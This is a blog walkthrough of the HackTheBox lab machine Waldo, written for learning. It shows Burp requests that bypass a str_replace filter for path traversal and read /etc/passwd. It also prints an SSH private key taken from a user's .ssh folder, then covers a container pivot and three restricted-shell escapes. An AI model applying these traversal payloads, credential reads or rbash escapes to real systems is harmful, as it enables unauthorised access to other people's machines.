HackTheBox – Waldo | Ivan's IT learning blog

This box is currently not in TJ Null’s OSCP-similar HTB list, and I did it only because it taught Linux capabilities, which I encountered in Lightweight which was in the HTB list. I found that I liked Waldo much better and it seemed quite OSCP-like except for the sandbox escape which was quite tricky. The only problem with this box is that you can’t get a root shell, only read root.txt

Enumeration

Three ports are open, 22, 80 and 8888. 8888 is unusual, so examine that first.

TCP 8888

This gave no response whatsover, even to a GET request.

root@kali:~/CTF/HTB/Waldo# nc 10.10.10.87 8888
GET / HTTP/1.1
^C

Web 80

Landing page is this

Clicking on a list let us view and edit it.

Or we can simply add a list to make list3.

gobuster couldn’t work because non-existent directories got 302 redirected

root@Kali:~/HTB/Waldo# gobuster dir -u http://10.10.10.87 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x .php,.txt,.html,.conf,.bak,.sh,.pl,.cgi --timeout 40s -t 150 -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.87
[+] Threads:        150
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html,conf,bak,sh,pl,cgi
[+] Timeout:        40s
===============================================================
2020/11/21 17:41:08 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.87/2cf5c204-

LFI dirRead.php

But while doing the above operations on adding/editing lists I had proxied it through Burp to understand whats going on. There were various POST requests made to

dirRead.php
fileRead.php
fileWrite.php

A POST request to dirRead.php listed the lists. So I tried this in Burp and could read the directory.

POST /dirRead.php HTTP/1.1
Host: 10.10.10.87
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.87/list.html
Content-type: application/x-www-form-urlencoded
Content-Length: 7
Connection: close
Cache-Control: max-age=0

path=./

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sat, 21 Nov 2020 09:43:31 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.1.16
Content-Length: 155

[".","..",".list","background.jpg","cursor.png","dirRead.php","face.png","fileDelete.php","fileRead.php","fileWrite.php","index.php","list.html","list.js"]

However when I tried path=../../../../etc/ (I didn’t try /etc/passwd directly since that was for fileRead.php) I got

false

Similarly for other directories like /tmp which definitely exist. Trying to access the list directly in the url with http://10.10.10.87/.list/list1 just returns

403 Forbidden

LFI fileRead.php

I was however, able to read the PHP code for dirRead.php with

POST /fileRead.php HTTP/1.1
Host: 10.10.10.87
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.87/list.html
Content-type: application/x-www-form-urlencoded
Content-Length: 17
Connection: close

file=dirRead.php

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sat, 21 Nov 2020 16:36:27 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.1.16
Content-Length: 391

{"file":"<?php\n\nif($_SERVER['REQUEST_METHOD'] === \"POST\"){\n\tif(isset($_POST['path'])){\n\t\theader('Content-type: application\/json');\n\t\t$_POST['path'] = str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST['path']);\n\t\techo json_encode(scandir(\"\/var\/www\/html\/\" . $_POST['path']));\n\t}else{\n\t\theader('Content-type: application\/json');\n\t\techo '[false]';\n\t}\n}\n"}

The response looks like its in JSON format, and I made the big initial mistake of trying to remove all the escape characters ‘\’ in vim with

:%s#\n#\r/g
:%s#\t#\t/g
:%s/\//g

Don’t do that. This led to a rabbit hole of my own making because the incorrectly decoded resulting code was impossible to bypass. Instead, note that json_encode() is used

json_encode(scandir(\"\/var\/www\/html\/\" . $_POST['path']));

which means that we should use the opposite json_decode() function. I later learned that IppSec used the even simpler jq command to decode the response (jq .file dirRead.php -r) But for myself I saved the response body containing the PHP code in .php files and used this script to decode them

#!/usr/bin/env php
# decode_php.php
<?php

$filename = $argv[1];

$data = file_get_contents($filename);
$code = json_decode($data);

print_r($code->file);

I could now read the json-encoded code in dirRead.php with this

root@Kali:~/HTB/Waldo/LFI# ./decode_php.php dirRead.php

<?php

if($_SERVER['REQUEST_METHOD'] === "POST"){
        if(isset($_POST['path'])){
                header('Content-type: application/json');
                $_POST['path'] = str_replace( array("../", "..\""), "", $_POST['path']);
                echo json_encode(scandir("/var/www/html/" . $_POST['path']));
        }else{
                header('Content-type: application/json');
                echo '[false]';
        }
}

Bypassing str_replace()

POST input to dirRead.php can sanitised with str_replace() which in this case replaces

../
.."

with nothing. But this works just once. In both natas25 and SkyTower this is similarly the case and we can replace ../ with .(../)./ (ignore the brackets and when those are replaced we get just ../

We can test the code with php interactive shell to see it gives us the directory traversal.

php > echo str_replace( array("../", "..\""), "", '..././');
../

and we can do this to get to directory /

path=..././..././..././..././

which then shows

[".","..",".dockerenv","bin","dev","etc","home","lib","media","mnt","proc","root","run","sbin","srv","sys","tmp","usr","var"]

fileRead.php has very similar code and we can read /etc/passwd with

file=..././..././..././..././etc/passwd

This returns

{"file":"root:x:0:0:root:\/root:\/bin\/ash\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nsync:x:5:0:sync:\/sbin:\/bin\/sync\nshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\nnews:x:9:13:news:\/usr\/lib\/news:\/sbin\/nologin\nuucp:x:10:14:uucp:\/var\/spool\/uucppublic:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/bin\/sh\nman:x:13:15:man:\/usr\/man:\/sbin\/nologin\npostmaster:x:14:12:postmaster:\/var\/spool\/mail:\/sbin\/nologin\ncron:x:16:16:cron:\/var\/spool\/cron:\/sbin\/nologin\nftp:x:21:21::\/var\/lib\/ftp:\/sbin\/nologin\nsshd:x:22:22:sshd:\/dev\/null:\/sbin\/nologin\nat:x:25:25:at:\/var\/spool\/cron\/atjobs:\/sbin\/nologin\nsquid:x:31:31:Squid:\/var\/cache\/squid:\/sbin\/nologin\nxfs:x:33:33:X Font Server:\/etc\/X11\/fs:\/sbin\/nologin\ngames:x:35:35:games:\/usr\/games:\/sbin\/nologin\npostgres:x:70:70::\/var\/lib\/postgresql:\/bin\/sh\ncyrus:x:85:12::\/usr\/cyrus:\/sbin\/nologin\nvpopmail:x:89:89::\/var\/vpopmail:\/sbin\/nologin\nntp:x:123:123:NTP:\/var\/empty:\/sbin\/nologin\nsmmsp:x:209:209:smmsp:\/var\/spool\/mqueue:\/sbin\/nologin\nguest:x:405:100:guest:\/dev\/null:\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/home\/nobody:\/bin\/sh\nnginx:x:100:101:nginx:\/var\/lib\/nginx:\/sbin\/nologin\n"}

which when decoded

root@Kali:~/HTB/Waldo/LFI# ./decode_php.php passwd

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin

Enumerating dirs

I did this to enumerate the /home directory with dirRead.php

path=..././..././..././..././home

and this showed

[".","..",".ash_history",".ssh",".viminfo","user.txt"]

Looking at dir .ssh/ we see

path=..././..././..././..././home/nobody/.ssh

[".","..",".monitor","authorized_keys","known_hosts"]

We can’t read .monitor

path=..././..././..././..././home/nobody/.ssh/.monitor

which returns false. This implies its a file instead. So I switched to fileRead.php and got this

POST /fileRead.php HTTP/1.1
Host: 10.10.10.87
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.87/list.html
Content-type: application/x-www-form-urlencoded
Content-Length: 54
Connection: close

file=..././..././..././..././home/nobody/.ssh/.monitor

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sat, 21 Nov 2020 17:15:16 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.1.16
Content-Length: 1741

{"file":"-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl\nmR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f\n87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS\ndGCc\/gNpW\/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN\no8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8\/6pceowqs9ujRkNzH9T1lJq4Fx1V\nvi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl\/wdmuPEW6kU\nvmzhRU3gcjuzwBET0TNejbL\/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR\/6\npKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5\n8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q\n1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox\/05qoOBL4kQxUM7\nVxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS\ndVa3yLECgYEA7jk51MvUGSIFF6GkXsNb\/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO\nv0og0X\/iROXAcp6Z9WGpIc6FhVgJd\/4bNlTR+A\/lWQwFt1b6l03xdsyaIyIWi9xr\nxsb2sLNWP56A\/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY\nqFfdAWrvVZjp26Yf\/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI\nyzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1\n\/pAcw\/+\/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw\/IMnLa3drm3CIAa32iU\nLRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ\/\nlnN2n1WyTIyEuGA\/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp\nw7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9\n1HLmBkDTjjj\/xAJAZuiOF4Rs\/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT\nrj1BhUCzZCUgQABtpC6vYj\/HLLlzpiC05AIEhDdvToPK\/0WuY64fds0VccAYmMDr\nX\/PlAoGAS6UhbCm5TWZhtL\/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2\nDvVny8gKbM\/OenwHnTlwRTEj5qdeAM40oj\/mwCDc6kpV1lJXrW2R5mCH9zgbNFla\nW0iKCBUAm5xZgU\/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro=\n-----END RSA PRIVATE KEY-----\n"}

Exploitation – SSH as nobody

This can be decoded to give a private key and since it’s in nobody’s /home dir I tried this and got in

root@Kali:~/HTB/Waldo/LFI# ./decode_php.php .monitor

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl
mR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f
87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS
dGCc/gNpW/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN
o8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8/6pceowqs9ujRkNzH9T1lJq4Fx1V
vi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl/wdmuPEW6kU
vmzhRU3gcjuzwBET0TNejbL/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR/6
pKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5
8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q
1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox/05qoOBL4kQxUM7
VxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS
dVa3yLECgYEA7jk51MvUGSIFF6GkXsNb/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO
v0og0X/iROXAcp6Z9WGpIc6FhVgJd/4bNlTR+A/lWQwFt1b6l03xdsyaIyIWi9xr
xsb2sLNWP56A/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY
qFfdAWrvVZjp26Yf/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI
yzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1
/pAcw/+/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw/IMnLa3drm3CIAa32iU
LRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ/
lnN2n1WyTIyEuGA/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp
w7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9
1HLmBkDTjjj/xAJAZuiOF4Rs/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT
rj1BhUCzZCUgQABtpC6vYj/HLLlzpiC05AIEhDdvToPK/0WuY64fds0VccAYmMDr
X/PlAoGAS6UhbCm5TWZhtL/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2
DvVny8gKbM/OenwHnTlwRTEj5qdeAM40oj/mwCDc6kpV1lJXrW2R5mCH9zgbNFla
W0iKCBUAm5xZgU/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro=
-----END RSA PRIVATE KEY-----


root@Kali:~/HTB/Waldo# chmod 0600 .monitor_key
root@Kali:~/HTB/Waldo# ssh -i .monitor_key nobody@10.10.10.87
load pubkey ".monitor_key": invalid format
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See .
waldo:~$

Post-exploitation – Container enumeration as nobody

I ran linpeas since lse doesn’t work with /bin/sh (Alpine). This tells us we are in a container and not the docker host.

[+] Is this a container? ........... Looks like we're in a Docker container

user.txt is readable in /home. Let’s look for a way to break out of this container. I spied ports TCP 8888 and 9000 listening, and 8888 was visible from outside as filtered. Forwarded back to Kali for study but this went nowhere. Now the interesting thing is that even though we SSH in as user nobody, we’re not connected on port 22 but rather 8888.

waldo:~$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN
tcp        0    316 10.10.10.87:8888        10.10.14.78:34158       ESTABLISHED
tcp        0      0 :::80                   :::*                    LISTEN
tcp        0      0 :::22                   :::*                    LISTEN
tcp        0      0 :::8888                 :::*                    LISTEN

The container or host is still listening on 22 though, strangely. We can check /etc/ssh/sshd_config to find that its curiously listening on 8888, which we are connected on and only user nobody is allowed to login.

Port 8888
AllowUsers nobody

ifconfig tells us the container is listening on two interfaces, the machine’s IP and the docker0 interface which is odd, since typically containers would only listen on its own Class B interface

waldo:~$ ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:9A:A0:D9:CC
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

ens33     Link encap:Ethernet  HWaddr 00:50:56:B9:27:21
          inet addr:10.10.10.87  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:134809 errors:0 dropped:65 overruns:0 frame:0
          TX packets:188608 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:19764310 (18.8 MiB)  TX bytes:60200543 (57.4 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:639640 errors:0 dropped:0 overruns:0 frame:0
          TX packets:639640 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:79897824 (76.1 MiB)  TX bytes:79897824 (76.1 MiB)

Unfortunately as I discovered later, since there’s no way to get a root shell I couldn’t investigate how the docker network settings were configured. SSH is listening on port 8888 not 22. Since we are in a container, it appears that SSHing to 10.10.10.87:22 got redirected to container:8888. But I wasn’t able to SSH to 8888

waldo:~/.ssh$ ssh -i .monitor -p 8888 nobody@10.10.10.87
ssh: connect to host 10.10.10.87 port 8888: Operation timed out
waldo:~/.ssh$ ssh -p 8888 -i .monitor nobody@localhost
ssh: connect to host localhost port 8888: Address not available
waldo:~/.ssh$ ssh -p 8888 -i .monitor nobody@172.17.0.1
ssh: connect to host 172.17.0.1 port 8888: Operation timed out

Also note that the OpenSSH version is different from Kali and from within the container, implying they are to different SSH servers and thereby hosts.

root@kali:~/CTF/HTB/Waldo# nc 10.10.10.87 22
SSH-2.0-OpenSSH_7.5

waldo:~$ nc 10.10.10.87 22
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3
^Cpunt!

An examination of authorized_keys in ~/.ssh showed the username monitor, implying the keys were actually for a user named monitor.

waldo:~/.ssh$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzuzK0MT740dpYH17403dXm3UM/VNgdz7ijwPfraXk3B/oKmWZHgkfqfg1xx2bVlT6oHvuWLxk6/KYG0gRjgWbTtfg+q3jN40F+opaQ5zJXVMtbp/zuzQVkGFgCLMas014suEHUhkiOkNUlRtJcbqzZzECV7XhyP6mcSJFOzIyKrWckJJ0YJz+A2lb8AA0g3i9b0qyUuqIAQMl9yFjnmwInnXrZj34jXHOoXx71vXbBVeKu82jw8sacUlXDpIeGY8my572+MAh4f6f7leRtzz/qlx6jCqz26NGQ3Mf1PWUmrgXHVW+L3cNqrdtnd2EghZpZp+arOD6NJOFJY4jBHvf monitor@waldo

Container escape to monitor

Using the same private SSH key, I was able to SSH to the docker host as monitor, but got stuck in rbash

waldo:~/.ssh$ ssh -i .monitor monitor@10.10.10.87
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
           &.
          @@@,@@/ %
       #*/%@@@@/.&@@,
   @@@#@@#&@#&#&@@@,*%/
   /@@@&###########@@&*(*
 (@################%@@@@@.     /**
 @@@@&#############%@@@@@@@@@@@@@@@@@@@@@@@@%((/
 %@@@@%##########&@@@....                 .#%#@@@@@@@#
 @@&%#########@@@@/                        */@@@%(((@@@%
    @@@#%@@%@@@,                       *&@@@&%(((#((((@@(
     /(@@@@@@@                     *&@@@@%((((((((((((#@@(
       %/#@@@/@ @#/@          ..@@@@%(((((((((((#((#@@@@@@@@@@@@&#,
          %@*(@#%@.,       /@@@@&(((((((((((((((&@@@@@@&#######%%@@@@#    &
        *@@@@@#        .&@@@#(((#(#((((((((#%@@@@@%###&@@@@@@@@@&%##&@@@@@@/
       /@@          #@@@&#(((((((((((#((@@@@@%%%%@@@@%#########%&@@@@@@@@&
      *@@      *%@@@@#((((((((((((((#@@@@@@@@@@%####%@@@@@@@@@@@@###&@@@@@@@&
      %@/ .&%@@%#(((((((((((((((#@@@@@@@&#####%@@@%#############%@@@&%##&@@/
      @@@@@@%(((((((((((##(((@@@@&%####%@@@%#####&@@@@@@@@@@@@@@@&##&@@@@@@@@@/
     @@@&(((#((((((((((((#@@@@@&@@@@######@@@###################&@@@&#####%@@*
     @@#(((((((((((((#@@@@%&@@.,,.*@@@%#####@@@@@@@@@@@@@@@@@@@%####%@@@@@@@@@@
     *@@%((((((((#@@@@@@@%#&@@,,.,,.&@@@#####################%@@@@@@%######&@@.
       @@@#(#&@@@@@&##&@@@&#@@/,,,,,,,,@@@&######&@@@@@@@@&&%######%@@@@@@@@@@@
        @@@@@@&%&@@@%#&@%%@@@@/,,,,,,,,,,/@@@@@@@#/,,.*&@@%&@@@@@@&%#####%@@@@.
          .@@@###&@@@%%@(,,,%@&,.,,,,,,,,,,,,,.*&@@@@&(,*@&#@%%@@@@@@@@@@@@*
            @@%##%@@/@@@%/@@@@@@@@@#,,,,.../@@@@@%#%&@@@@(&@&@&@@@@(
            .@@&##@@,,/@@@@&(.  .&@@@&,,,.&@@/         #@@%@@@@@&@@@/
           *@@@@@&@@.*@@@          %@@@*,&@@            *@@@@@&.#/,@/
          *@@&*#@@@@@@@&     #@(    .@@@@@@&    ,@@@,    @@@@@(,@/@@
          *@@/@#.#@@@@@/    %@@@,   .@@&%@@@     &@&     @@*@@*(@@#
           (@@/@,,@@&@@@            &@@,,(@@&          .@@%/@@,@@
             /@@@*,@@,@@@*         @@@,,,,,@@@@.     *@@@%,@@**@#
               %@@.%@&,(@@@@,  /&@@@@,,,,,,,%@@@@@@@@@@%,,*@@,#@,
                ,@@,&@,,,,(@@@@@@@(,,,,,.,,,,,,,,**,,,,,,.*@/,&@
                 &@,*@@.,,,,,..,,,,&@@%/**/@@*,,,,,&(.,,,.@@,,@@
                 /@%,&@/,,,,/@%,,,,,*&@@@@@#.,,,,,.@@@(,,(@@@@@(
                  @@*,@@,,,#@@@&*..,,,,,,,,,,,,/@@@@,*(,,&@/#*
                  *@@@@@(,,@*,%@@@@@@@&&#%@@@@@@@/,,,,,,,@@
                       @@*,,,,,,,,,.*/(//*,..,,,,,,,,,,,&@,
                        @@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
                        &@&,,,,,,,,,,,,,,,,,,,,,,,,,,,,&@#
                         %@(,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
                         ,@@,,,,,,,,@@@&&&%&@,,,,,..,,@@,
                          *@@,,,,,,,.,****,..,,,,,,,,&@@
                           (@(,,,.,,,,,,,,,,,,,,.,,,/@@
                           .@@,,,,,,,,,,,,,...,,,,,,@@
                            ,@@@,,,,,,,,,,,,,,,,.(@@@
                              %@@@@&(,,,,*(#&@@@@@@,

                            Here's Waldo, where's root?
Last login: Sat Nov 21 13:21:58 2020 from 10.10.10.87
-rbash: alias: command not found
monitor@waldo:~$
monitor@waldo:~$ echo $0
-rbash

Escaping rbash

There are three ways to escape rbash. Before that let’s examine the commands available to us found in bin/

monitor@waldo:~$ ls -lah bin/
total 8.0K
dr-xr-x--- 2 root monitor 4.0K May  3  2018 .
drwxr-x--- 5 root monitor 4.0K Jul 24  2018 ..
lrwxrwxrwx 1 root root       7 May  3  2018 ls -> /bin/ls
lrwxrwxrwx 1 root root      13 May  3  2018 most -> /usr/bin/most
lrwxrwxrwx 1 root root       7 May  3  2018 red -> /bin/ed
lrwxrwxrwx 1 root root       9 May  3  2018 rnano -> /bin/nano

1 – Running a copied bash from inside rbash (Intended)

To escape rbash, we need to change our shell to bash, but since bash is not in the list of allowed binaries we can’t run /bin/bash directly. Nor can we copy it to a folder which we can run since we don’t have access to cp (or even cd!)

We do have nano and ed (rather than the restricted versions of these rnano and red), the latter being some kind of rarely used text editor. We can use it to copy /bin/bash to a place where we can execute it and thereby escape rbash. But note that ed being a text editor saves files with rw perms (no executable rights) and we can’t chmod +x that (cmd unavailable) so our best bet is to overwrite an existing executable file and that happens to to be logMonitor in app-dev/

monitor@waldo:~$ ls -lah
total 40K
drwxr-x--- 5 root    monitor 4.0K Jul 24  2018 .
drwxr-xr-x 5 root    root    4.0K May  3  2018 ..
drwxrwx--- 3 app-dev monitor 4.0K Nov 22 12:27 app-dev
lrwxrwxrwx 1 root    root       9 Jul 24  2018 .bash_history -> /dev/null
-r--r----- 1 root    monitor   15 May  3  2018 .bash_login
-r--r----- 1 root    monitor   15 May  3  2018 .bash_logout
-r--r----- 1 root    monitor   15 May  3  2018 .bash_profile
-r--r----- 1 root    monitor 3.6K May  3  2018 .bashrc
dr-xr-x--- 2 root    monitor 4.0K May  3  2018 bin
-r--r----- 1 root    monitor   15 May  3  2018 .profile
dr-x------ 2 monitor monitor 4.0K May  3  2018 .ssh
monitor@waldo:~$ ls -lah app-dev/
total 2.2M
drwxrwx--- 3 app-dev monitor 4.0K Nov 22 12:27 .
drwxr-x--- 5 root    monitor 4.0K Jul 24  2018 ..
-rwxrwx--- 1 app-dev monitor  14K Nov 22 12:27 logMonitor
-r--r----- 1 app-dev monitor  14K May  3  2018 logMonitor.bak
-rw-rw---- 1 app-dev monitor 2.7K May  3  2018 logMonitor.c
-rw-rw---- 1 app-dev monitor  488 May  3  2018 logMonitor.h
-rw-rw---- 1 app-dev monitor 2.2M May  3  2018 logMonitor.h.gch
-rw-rw---- 1 app-dev monitor 6.7K May  3  2018 logMonitor.o
-rwxr----- 1 app-dev monitor  266 May  3  2018 makefile
-r-xr-x--- 1 app-dev monitor  795 May  3  2018 .restrictScript.sh
drwxr-x--- 2 app-dev monitor 4.0K May  3  2018 v0.1

Copy bash by first opening it as an argument to ed

monitor@waldo:~$ red /bin/bash
1099016
w app-dev/logMonitor
1099016
monitor@waldo:~$ app-dev/logMonitor
-rbash: app-dev/logMonitor: restricted: cannot specify `/' in command names

We appear to be stuck here, since we can’t specify the slash to run logMonitor but note that our $PATH already includes that so we can run it directly

monitor@waldo:~$ echo $PATH
/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1
monitor@waldo:~$ logMonitor
tmp.I58YipCkrz: dircolors: command not found
monitor@waldo:~$ cd /home
monitor@waldo:/home$

Now all that remains is to modify the $PATH to include the standard linux /bin directories so we can run all the commands.

monitor@waldo:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
monitor@waldo:~$ id
uid=1001(monitor) gid=1001(monitor) groups=1001(monitor)

2 – Shell escape from ed

This appears to be unintended, if comments on IppSec’s video are accurate. We can escape easily with the exclamation mark

monitor@waldo:~$ red
!/bin/bash
bash: dircolors: command not found
monitor@waldo:~$ cd ..
monitor@waldo:/home$

and set the path so we can commands.

3 – SSH ignore bashrc

The easiest way to escape is not to run rbash upon login but instead to run bash, skip bash_profiles and bashrc files as done here.

waldo:~/.ssh$ ssh -i .monitor monitor@10.10.10.87 -t "bash --noprofile --norc"
bash-4.4$ id
uid=1001(monitor) gid=1001(monitor) groups=1001(monitor)

If your curious what “-t” does, it forces a tty allocation, which some programs require to work when run on SSH. Here’s an explanation of what a pseudo-terminal (pty) is. We get an undecorated bash shell which doesn’t tell us the current user, working directory but this can be fixed easily. Checking out /etc/passwd we see that the user is assigned rbash on login.

monitor@waldo ~ $ getent passwd | grep monitor
